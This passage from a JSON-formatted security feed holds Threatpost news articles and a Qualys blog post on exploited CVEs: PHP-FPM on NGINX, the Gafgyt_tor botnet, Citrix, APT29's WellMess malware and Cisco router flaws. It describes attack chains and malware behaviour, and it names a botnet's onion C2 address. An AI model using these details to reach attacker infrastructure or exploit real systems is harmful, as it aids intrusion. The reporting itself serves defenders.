mounting an exploit.\n\nAdmins can identify vulnerable FastCGI directives in their NGINX configurations with a bash command, \u201cegrep -Rin \u2013color \u2018fastcgi_split_path\u2019 /etc/nginx/,\u201d according to Wallarm.\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "cvss3": {}, "published": "2019-10-28T16:18:11", "type": "threatpost", "title": "PHP Bug Allows Remote Code-Execution on NGINX Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11043", "CVE-2020-0688", "CVE-2020-1472"], "modified": "2019-10-28T16:18:11", "id": "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "href": "https://threatpost.com/php-bug-rce-nginx-servers/149593/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-05T16:44:35", "description": "Researchers have discovered what they say is the first variant of the Gafgyt botnet family to cloak its activity using the Tor network.\n\nGafgyt, a [botnet that was uncovered in 2014](<https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/>), has become infamous for launching large-scale distributed denial-of-service (DDoS) attacks. Researchers first discovered activity from the newest variant, which they call Gafgyt_tor, on Feb. 15.\n\nIn order to evade detection, Gafgyt_tor uses Tor to hide its command-and-control (C2) communications, and encrypts sensitive strings in the samples. The use of [Tor by malware families is nothing new;](<https://threatpost.com/chewbacca-latest-malware-to-take-a-liking-to-tor/103220/>) however, researchers said they haven\u2019t seen Gafgyt leveraging the anonymity network until now.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cCompared with other Gafgyt variants, the biggest change of Gafgyt_tor is that the C2 communication is based on Tor, which increases the difficulty of detection and blocking,\u201d said researchers with NetLab 360 [on Thursday](<https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/>). \u201cThe Tor-based C2 communication mechanism has been seen in other families we have analyzed before\u2026 but this is the first time we encountered it in the Gafgyt family.\u201d\n\n## **Gafgyt_tor Botnet: Propagation and New Functionalities**\n\nThe botnet is mainly propagated through weak Telnet passwords \u2013 a common issue on [internet of things devices](<https://threatpost.com/hacker-leaks-more-than-500k-telnet-credentials-for-iot-devices/152015/>) \u2013 and through exploiting three vulnerabilities. These vulnerabilities include a remote code execution flaw (CVE-2019-16920) [in D-Link devices](<https://threatpost.com/d-link-routers-zero-day-flaws/162064/>); a remote code execution vulnerability in Liferay enterprise portal software (for which no CVE is available); and a flaw (CVE-2019-19781) in Citrix Application Delivery Controller.\n\nResearchers said that the code structure of Gafgyt_tor\u2019s main function \u2013 which adds the Tor proxy function to provide the IP server\u2019s address \u2013 shows widespread changes.\n\n\u201cThe original initConnection() function, which is responsible for establishing the C2 connection, is gone, replaced by a large section of code responsible for establishing the Tor connection,\u201d they said.\n\n## **New Tor Capabilities, Commands**\n\nWithin this large section of code exists tor_socket_init, a function that is responsible for initializing a list of proxy nodes with IP addresses and a port. Researchers said that over 100 Tor proxies can be built in in this way \u2013 and new samples are continually updating the proxy list.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/05101946/ver1_ver2_cmp_cfg.en_.png>)\n\nThe new versus old code structure for the Gafgyt variant. Credit: NetLab 360\n\n\u201cAfter initializing the proxy list, the sample will select a random node from the list to enable Tor communication via tor_retrieve_addr and tor_retrieve_port,\u201d said researchers.\n\nAfter it establishes a connection with the C2, the botnet requests wvp3te7pkfczmnnl.onion through the darknet, from which it then awaits commands.\n\n\u201cThe core function of Gafgyt_tor is still DDoS attacks and scanning, so it mostly follows the common Gafgyt directive,\u201d said researchers. They noted, a new directive called LDSERVER has been added to the botnet, which allows the C2 to quickly specify servers from which the payloads are downloaded. This allows attackers to quickly switch courses should an attacker-owned download server be identified and blocked, said researchers.\n\n\u201cThis directive means that C2 can dynamically switch download servers, so that it can quickly switch to a new download server to continue propagation if the current one is blocked,\u201d said researchers,\n\n## **Links to Freak Threat Actor, Other Botnets**\n\nResearchers said that the variant shares the same origin with the Gafgyt samples distributed by a threat group that NetLab 360 researchers call the keksec group, and that other researchers [call the Freak threat actor](<https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/>). They said, the keksec group reuses code and IP addresses between various other bot families, including the Tsunami botnet as well as the Necro botnet family uncovered in January.\n\n\u201cWe think that Gafgyt_tor and Necro are very likely operated by the same group of people, who have a pool of IP addresses and multiple botnet source codes, and have the ability of continuous development,\u201d said researchers. \u201cIn actual operation, they form different families of botnets, but reuse infrastructure such as IP address.\u201d\n\n## **Other Gafgyt Botnet Variants**\n\nGafgyt.tor is only the latest variant of the popular botnet to come to light. In 2019, researchers warned of a [new Gafgyt variant adding vulnerable IoT devices](<https://threatpost.com/valve-source-engine-fortnite-servers-crippled-by-gafgyt-variant/149719/>) to its botnet arsenal and using them to cripple gaming servers worldwide.\n\nIn 2018, researchers said they discovered new variants for the Mirai and [Gafgyt IoT botnets ](<https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/>)targeting well-known vulnerabilities in Apache Struts and SonicWall; as well as a separate attack actively launching two IoT/Linux botnet [campaigns](<https://threatpost.com/d-link-dasan-routers-under-attack-in-yet-another-assault/134255/>), exploiting the [CVE-2018-10562 and CVE-2018-10561 bugs in Dasan routers](<https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/>).\n\nMore recently, last year a botnet called [Hoaxcalls emerged](<https://threatpost.com/hoaxcalls-botnet-symantec-secure-web-gateways/155806/>), as a variant of the Gafgyt family. The botnet, which can be marshalled for large-scale distributed denial-of-service (DDoS) campaigns, is spreading [via an unpatched vulnerability](<https://threatpost.com/fast-moving-ddos-botnet-unpatched-zyxel-rce-bug/155059/>) impacting the ZyXEL Cloud CNM SecuManager.\n\n**_Check out our free _****_[upcoming live webinar events](<https://threatpost.com/category/webinars/>)_****_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_** \n\u00b7 March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly** ([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>)) \n\u00b7 April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-05T15:55:41", "type": "threatpost", "title": "D-Link, IoT Devices Under Attack By Tor-Based Gafgyt Variant", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-10561", "CVE-2018-10562", "CVE-2019-16920", "CVE-2019-19781"], "modified": "2021-03-05T15:55:41", "id": "THREATPOST:B7F31FCDC8936516C077D39FEF9235AA", "href": "https://threatpost.com/d-link-iot-tor-gafgyt-variant/164529/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:22:57", "description": "Multiple vulnerabilities in the Citrix Application Delivery Controller (ADC) and Gateway would allow code injection, information disclosure and denial of service, the networking vendor announced Tuesday. Four of the bugs are exploitable by an unauthenticated, remote attacker.\n\nThe Citrix products (formerly known as NetScaler ADC and Gateway) are used for application-aware traffic management and secure remote access, respectively, and are installed in at least 80,000 companies in 158 countries, according to a December assessment from Positive Technologies.\n\nOther flaws announced Tuesday also affect Citrix SD-WAN WANOP appliances, models 4000-WO, 4100-WO, 5000-WO and 5100-WO.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAttacks on the management interface of the products could result in system compromise by an unauthenticated user on the management network; or system compromise through cross-site scripting (XSS). Attackers could also create a download link for the device which, if downloaded and then executed by an unauthenticated user on the management network, could result in the compromise of a local computer.\n\n\u201cCustomers who have configured their systems in accordance with [Citrix recommendations](<https://docs.citrix.com/en-us/citrix-adc/citrix-adc-secure-deployment/secure-deployment-guide.html>) [i.e., to have this interface separated from the network and protected by a firewall] have significantly reduced their risk from attacks to the management interface,\u201d according to the vendor.\n\nThreat actors could also mount attacks on Virtual IPs (VIPs). VIPs, among other things, are used to provide users with a unique IP address for communicating with network resources for applications that do not allow multiple connections or users from the same IP address.\n\nThe VIP attacks include denial of service against either the Gateway or Authentication virtual servers by an unauthenticated user; or remote port scanning of the internal network by an authenticated Citrix Gateway user.\n\n\u201cAttackers can only discern whether a TLS connection is possible with the port and cannot communicate further with the end devices,\u201d according to the critical [Citrix advisory](<https://support.citrix.com/article/CTX276688>). \u201cCustomers who have not enabled either the Gateway or Authentication virtual servers are not at risk from attacks that are applicable to those servers. Other virtual servers e.g. load balancing and content switching virtual servers are not affected by these issues.\u201d\n\nA final vulnerability has been found in Citrix Gateway Plug-in for Linux that would allow a local logged-on user of a Linux system with that plug-in installed to elevate their privileges to an administrator account on that computer, the company said.\n\nOf the 11 vulnerabilities, there are six possible attacks routes; but five of those have barriers to exploitation. Also, the latest patches fully resolve all the issues. Here\u2019s a full list of the bugs with exploitation barriers listed:\n\n\n\nSince Citrix is mainly used for giving remote access to applications in companies\u2019 internal networks, a compromise could easily be used as a foothold to move laterally across a victim organization. However, Citrix CISO Fermin Serna said in an accompanying [blog post](<https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/>) that the company isn\u2019t aware of any active exploitation of the issues so far, and he stressed that the barriers to exploitation of these flaws are significant.\n\n\u201cThere are barriers to many of these attacks; in particular, for customers where there is no untrustworthy traffic on the management network, the remaining risk reduces to a denial-of-service attack,\u201d he wrote. \u201cAnd in that case, only when Gateway or authentication virtual servers are being used. Other virtual servers, for example, load balancing and content switching virtual servers, are not affected by the issue.\u201d\n\nHe added, \u201cthree possible attacks additionally require some form of existing access. That effectively means an external malicious actor would first need to gain unauthorized access to a vulnerable device to be able to conduct an attack.\u201d\n\nSerna also noted that the bugs aren\u2019t related to the CVE-2019-19781 critical bug in Citrix ADC and Gateway, [announced in December](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>). That zero-day flaw [remained unpatched](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) for almost a month and in-the-wild attacks [followed](<https://threatpost.com/chinese-hackers-exploit-cisco-citrix-espionage/154133/>).\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a _**[**_FREE webinar_**](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>)**_, \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>)**_ for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-07-07T14:44:30", "type": "threatpost", "title": "Citrix Bugs Allow Unauthenticated Code Injection, Data Theft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2020-5135", "CVE-2020-8187", "CVE-2020-8190", "CVE-2020-8191", "CVE-2020-8193", "CVE-2020-8194", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8197", "CVE-2020-8198", "CVE-2020-8199"], "modified": "2020-07-07T14:44:30", "id": "THREATPOST:575F655420B93C2305DEE73F769E7E0B", "href": "https://threatpost.com/citrix-bugs-allow-unauthenticated-code-injection-data-theft/157214/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-16T19:56:37", "description": "The advanced threat actor known as APT29 has been hard at work attempting to pilfer COVID-19 vaccine research from academic and pharmaceutical research institutions in various countries around the world, including the U.S.\n\nThat\u2019s according to a joint alert from the U.S. Department of Homeland Security (DHS), the U.K.\u2019s National Cyber Security Centre (NCSC) and Canada\u2019s Communications Security Establishment (CSE), [issued Thursday](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>).\n\nThe 14-page advisory details the recent activity of Russia-linked APT29 (a.k.a. CozyBear or the Dukes), including the use of custom malware called \u201cWellMess\u201d and \u201cWellMail\u201d for data exfiltration.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThroughout 2020, APT29 has targeted various organizations involved in COVID-19 vaccine development in Canada, the United States and the United Kingdom, highly likely with the intention of stealing information and intellectual property relating to the development and testing of COVID-19 vaccines,\u201d the report noted.\n\nThis specific activity was seen starting in April, but security researchers noted that nation-state espionage targeted to coronavirus treatments and cures [has been a phenomenon all year](<https://threatpost.com/nation-backed-apts-covid-19-spy-attacks/155082/>).\n\n\u201cCOVID-19 is an existential threat to every government in the world, so it\u2019s no surprise that cyber-espionage capabilities are being used to gather intelligence on a cure,\u201d said John Hultquist, senior director of analysis at Mandiant Threat Intelligence, via email. \u201cThe organizations developing vaccines and treatments for the virus are being heavily targeted by Russian, Iranian and Chinese actors seeking a leg up on their own research. We\u2019ve also seen significant COVID-related targeting of governments that began as early as January.\u201d\n\n## **Exploits in Play**\n\nTo mount the attacks, APT29 is using exploits for known vulnerabilities to gain initial access to targets, according to the analysis, along with spearphishing to obtain authentication credentials to internet-accessible login pages for target organizations. The exploits in rotation include the recent [Citrix code-injection bug](<https://threatpost.com/citrix-bugs-allow-unauthenticated-code-injection-data-theft/157214/>) (CVE-2019-19781); a publicized [Pulse Secure VPN flaw](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) (CVE-2019-11510); and issues in FortiGate (CVE-2018-13379) and Zimbra (CVE-2019-9670).\n\n\u201cThe group conducted basic vulnerability scanning against specific external IP addresses owned by the [targeted] organizations,\u201d according to the report. \u201cThe group then deployed public exploits against the vulnerable services identified. The group has been successful using recently published exploits to gain initial footholds.\u201d\n\nOnce a system is compromised, the group then looks to obtain additional authentication credentials to allow further access and spread laterally.\n\n## **Custom Malware**\n\nOnce established in a network, APT29 is employing homegrown malware that the NCSC is calling WellMess and WellMail, to conduct further operations on the victim\u2019s system and exfiltrate data.\n\nWellMess, first discovered in July 2018, is malware that comes in Golang or .NET versions and supports HTTP, TLS and DNS for communications.\n\nNamed after one of the function names in the malware, \u201cWellMess is a lightweight malware designed to execute arbitrary shell commands, upload and download files,\u201d according to the advisory.\n\nWellMail malware meanwhile, named after file paths containing the word \u2018mail\u2019 and the use of server port 25, is also lightweight \u2013 and is designed to run commands or scripts while communicating with a hardcoded command-and-control (C2) server.\n\n\u201cThe binary is an ELF utility written in Golang which receives a command or script to be run through the Linux shell,\u201d according to the NCSC. \u201cTo our knowledge, WellMail has not been previously named in the public domain.\u201d\n\nBoth malwares uses hard-coded client and certificate authority TLS certificates to communicate with their C2 servers.\n\n\u201cWellMess and WellMail samples contained TLS certificates with the hard-coded subjectKeyIdentifier (SKI) \u20180102030406\u2019, and used the subjects \u2018C=Tunis, O=IT\u2019 and \u2018O=GMO GlobalSign, Inc\u2019 respectively,\u201d detailed the report. \u201cThese certificates can be used to identify further malware samples and infrastructure. Servers with this GlobalSign certificate subject may be used for other functions in addition to WellMail malware communications.\u201d\n\nAPT29 is also using another malware, dubbed \u2018SoreFang\u2019 by the NCSC, which is a first-stage downloader that uses HTTP to exfiltrate victim information and download second-stage malware. It\u2019s using the same C2 infrastructure as a WellMess sample, the agencies concluded.\n\nThis sample is not a custom job: \u201cIt is likely that SoreFang targets SangFor devices. Industry reporting indicates that other actors, reportedly including [DarkHotel](<https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/>), have also targeted SangFor devices,\u201d noted the NCSC.\n\n## **APT29: A Sporadically High-Profile Threat**\n\n[APT29](<https://attack.mitre.org/groups/G0016/>) has long been seen targeting high-value targets across the think-tank, law enforcement, media, U.S. military, imagery, transportation, pharmaceutical, national government and defense contracting sectors.\n\nThe group is is perhaps best-known for the [intrusion](<https://threatpost.com/dnc-hacked-research-on-trump-stolen/118656/>) at the Democratic National Committee ahead of the U.S. presidential election in 2016. It was also implicated in [a widespread phishing campaign](<https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/>) in November 2016, in attacks against the White House, State Department and Joint Chiefs of Staff.\n\nIt was next seen in November 2017 [executing a Tor backdoor](<https://threatpost.com/apt29-used-domain-fronting-tor-to-execute-backdoor/124582/>), and then [it reemerged](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) in 2018 with a widespread espionage campaign against military, media and public-sector targets.\n\nIts history stretches back a few years though: It [was also seen](<https://threatpost.com/white-house-state-department-counted-among-cozyduke-apt-victims/112382/>) by Kaspersky Lab carrying out data-mining attacks against the White House and the Department of State in 2014.\n\nResearchers from firms [like Mandiant](<https://www.fireeye.com/current-threats/apt-groups/rpt-apt29.html>) believe APT29 to be linked to Russian government-backed operations \u2013 an assessment that the DHS and NCSC reiterated in the latest advisory, saying that it is \u201calmost certainly part of the Russian intelligence services.\u201d\n\nWhile its publicly profiled activity tends to be sporadic, APT29 is rarely at rest, according to Mandiant\u2019s Hultquist.\n\n\u201cDespite involvement in several high-profile incidents, APT29 rarely receives the same attention as other Russian actors because they tend to quietly focus on intelligence collection,\u201d he said via email. \u201cWhereas GRU actors have brazenly leaked documents and carried out destructive attacks, APT29 digs in for the long term, siphoning intelligence away from its target.\u201d\n\nThis latest case is no exception to that M.O., according to the advisory: \u201cAPT29 is likely to continue to target organizations involved in COVID-19 vaccine research and development, as they seek to answer additional intelligence questions relating to the pandemic,\u201d the agencies concluded.\n\nThat said, at least one researcher warned that the end-game of the activity might be more nefarious than simply getting a leg up on a cure.\n\n\u201cAPT29 (Cozy Bear, Office Monkeys) has successfully demonstrated the extension of nation-state power through cyber-action for more than a dozen years,\u201d Michael Daly, CTO at Raytheon Intelligence &amp; Space, said via email. \u201cHowever, they are not focused on simple intellectual property theft. Instead, their focus is rooted in influence operations \u2013 the changing of hearts and minds to thwart and diminish the power of governments and organizations.\u201d\n\nHe added, \u201cIn the case of this breach of vaccine research centers, we should be most concerned not that someone else might also get a vaccine, but that the information will be used to undermine the confidence of the public in the safety or efficacy of the vaccines, slowing their adoption, or in some way cause their release to be delayed. The effect of such a delay would be both impactful to the health of Western populations, but also to the social stability and economic stability of the West.\u201d\n", "cvss3": {}, "published": "2020-07-16T18:05:20", "type": "threatpost", "title": "Hackers Look to Steal COVID-19 Vaccine Research", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670"], "modified": "2020-07-16T18:05:20", "id": "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "href": "https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-08T12:00:33", "description": "After a botched first attempt at patching two high-severity bugs affecting its RV320 and RV325 routers, Cisco Systems is out with fresh new fixes for both devices. However, Cisco isn\u2019t out of the woods yet. On Thursday, it also reported two new medium-severity router bugs impacting the same router models \u2013 and with no reported fixes or workarounds.\n\nThe good news for Cisco was it said it finally successfully patched its RV320 and RV325 WAN VPN routers after first bungling the fix. Last week, [Cisco notified customers](<https://threatpost.com/cisco-releases-flood-of-patches-for-ios-xe-and-small-business-routers/143228/>) that it had mismanaged a patch originally issued in September 2018 when it attempted to fix two router vulnerabilities ([CVE-2019-1652](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>) and [CVE-2019-1653](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>)) \u2013 both rated as being of high importance.\n\n\u201cThe initial fix for this vulnerability was found to be incomplete. The complete fix is now available in Firmware Release 1.4.2.22,\u201d wrote Cisco on Thursday, referring to ([CVE-2019-1652](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>)) a command injection vulnerability. According to the bulletin, the flaw allowed an authenticated, remote attacker with administrative privileges to execute arbitrary commands on either the RV320 and RV325 routers.\n\nFor [CVE-2019-1653](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>), Cisco posted the exact [same status update](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>), notifying customers of the same firmware fix. The bug in this case is an information disclosure vulnerability \u201c[that] could allow an unauthenticated, remote attacker to retrieve sensitive information,\u201d Cisco wrote.\n\n**Righting the Routers\u2019 Wrongs **\n\nInitially, the bugs were identified last September by RedTeam Pentesting and patched by Cisco on January 23. Making matters worse, on January 25, security researcher [David Davidson published proof-of-concept](<https://github.com/0x27/CiscoRV320Dump>) hacks for two routers. As customers rushed to apply the patches, hackers reportedly began attacking both routers.\n\nPart of Cisco\u2019s January fix included blacklisting the so-called client for URLs (or cURL) on the modems. CURL is a command line tool for transferring data using various protocols. Presumably, blacklisting the user agent for cURL would keep attackers out. That wasn\u2019t the case, and Cisco critics chimed in, stating that the blacklisting could easily be bypassed.\n\nhttps://twitter.com/hrbrmstr/status/1110995488235503616\n\nLast Wednesday, Cisco admitted as much, relaying a message to customers that both router patches were \u201cincomplete\u201d and that both were still vulnerable to attack. It added that in both cases, \u201cfirmware updates that address [these vulnerabilities] are not currently available.\u201d It added there are no workarounds that address either vulnerability.\n\n**New Medium-Severity Headaches for Cisco **\n\nAlso Thursday, Cisco reported two new medium-severity bug also affecting its RV320 and RV325 routers, both with no patches available. One bug ([CVE-2019-1828](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190404-rv-weak-encrypt>)) is tied to weak credential encryption use by both routers. The other is insufficient validation of a user-supplied input bug ([CVE-2019-1827](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190404-rv-xss>)), also affecting both routers.\n\nBoth reports warn, \u201cThere are no workarounds that address this vulnerability.\u201d Cisco does not mention anything about a patch in either advisory.\n\nAs for the weak credential vulnerability, it \u201cexists because affected devices use weak encryption algorithms for user credentials. An attacker could exploit this vulnerability by conducting a man-in-the-middle attack and decrypting intercepted credentials. A successful exploit could allow the attacker to gain access to an affected device with administrator privileges,\u201d according to Cisco.\n\nAs for the input bug, Cisco warns, \u201cA vulnerability in the Online Help web service of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the service.\u201d\n\nAs for exploitation of the bugs, Cisco said of the weak credential bug ([CVE-2019-1828](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190404-rv-weak-encrypt>)): \u201cThe Cisco Product Security Incident Response Team (PSIRT) is aware of the public announcement or malicious use of the vulnerability that is described in this advisory.\u201d It thanked GitHub user 0x27 for reporting the vulnerability.\n\nCisco said it was not aware of any public exploits tied to the input validation bug.\n\nCisco did not return a request to comment for this article.\n", "cvss3": {}, "published": "2019-04-05T20:29:09", "type": "threatpost", "title": "Cisco Finally Patches Router Bugs As New Unpatched Flaws Surface", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653", "CVE-2019-1827", "CVE-2019-1828"], "modified": "2019-04-05T20:29:09", "id": "THREATPOST:A584E3ED4239CD6CF484C0B5869C4A4E", "href": "https://threatpost.com/cisco-finally-patches-routers-bugs-as-new-unpatched-flaws-surface/143528/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2020-10-23T16:02:16", "description": "On October 20, 2020, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.\n\n&quot;Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and \nmitigation efforts,&quot; said the NSA advisory. It also recommended &quot;critical system owners consider these actions a priority, in order to mitigate the loss of sensitive information that could impact U.S. policies, strategies, plans, and competitive advantage.&quot;\n\nEarlier this year, the NSA also announced Sandworm actors exploiting the [Exim MTA Vulnerability](<https://blog.qualys.com/product-tech/2020/05/29/nsa-announces-sandworm-actors-exploiting-exim-mta-vulnerability-cve-2019-10149>). Similar alerts have been published by the Cybersecurity and Infrastructure Security Agency (CISA) over the last year. CISA also issued an [advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>) notifying about vulnerabilities that were exploited in the wild to retrieve sensitive data such as intellectual property, economic, political, and military information. \n\nHere is a list of 25 publicly known vulnerabilities (CVEs) published by the NSA, along affected products and associated Qualys VMDR QID(s) for each vulnerability:\n\n**CVE-ID(s)**| **Affected products**| **Qualys QID(s)** \n---|---|--- \nCVE-2020-5902| Big-IP devices| 38791, 373106 \nCVE-2019-19781| Citrix Application Delivery Controller \nCitrix Gateway \nCitrix SDWAN WANOP| 150273, 372305, 372685 \nCVE-2019-11510| Pulse Connect Secure| 38771 \nCVE-2020-8193 \nCVE-2020-8195 \nCVE-2020-8196| Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 \nCitrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7| 13833, 373116 \nCVE-2019-0708| Microsoft Windows multiple products| 91541, 91534 \nCVE-2020-15505| MobileIron Core &amp; Connector| 13998 \nCVE-2020-1350| Microsoft Windows multiple products| 91662 \nCVE-2020-1472| Microsoft Windows multiple products| 91688 \nCVE-2019-1040| Microsoft Windows multiple products| 91653 \nCVE-2018-6789| Exim before 4.90.1| 50089 \nCVE-2020-0688| Multiple Microsoft Exchange Server| 50098 \nCVE-2018-4939| Adobe ColdFusion| 370874 \nCVE-2015-4852| Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0| 86362, 86340 \nCVE-2020-2555| Oracle Coherence product of Oracle Fusion Middleware Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.| 372345 \nCVE-2019-3396| Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3), and from version 6.14.0 before 6.14.2| 13459 \nCVE-2019-11580| Atlassian Crowd and Crowd Data Center| 13525 \nCVE-2020-10189| Zoho ManageEngine Desktop Central before 10.0.474| 372442 \nCVE-2019-18935| Progress Telerik UI for ASP.NET AJAX through 2019.3.1023| 372327, 150299 \nCVE-2020-0601| Microsoft Windows multiple products| 91595 \nCVE-2019-0803| Microsoft Windows multiple products| 91522 \nCVE-2017-6327| Symantec Messaging Gateway before 10.6.3-267| 11856 \nCVE-2020-3118| Cisco IOS XR, NCS| 316792 \nCVE-2020-8515| DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices| 13730 \n \n## Detect 25 Publicly Known Vulnerabilities using VMDR\n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds: [CVE-2019-11510,CVE-2020-5902,CVE-2019-19781,CVE-2020-8193,CVE-2020-8195,CVE-2020-8196,CVE-2019-0708,CVE-2020-15505,CVE-2020-1472,CVE-2019-1040,CVE-2020-1350,CVE-2018-6789,CVE-2018-4939,CVE-2020-0688,CVE-2015-4852,CVE-2020-2555,CVE-2019-3396,CVE-2019-11580,CVE-2020-10189,CVE-2019-18935,CVE-2020-0601,CVE-2019-0803,CVE-2017-6327,CVE-2020-3118,CVE-2020-8515]_\n\n * \n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for &quot;Active Attack&quot; RTI:\n\n\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable host through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking this vulnerability.\n\n\n\nWith VMDR Dashboard, you can track 25 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [&quot;NSA&#x27;s Top 25 Vulnerabilities from China&quot; dashboard](<https://qualys-secure.force.com/customer/s/article/000006429>).\n\n\n\n### **Recommendations**\n\nAs guided by CISA, to protect assets from exploiting, one must do the following:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Vigilance team of an organization should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n\n#### **Remediation and Mitigation**\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching the high-priority commonly exploited vulnerabilities.\n\n### 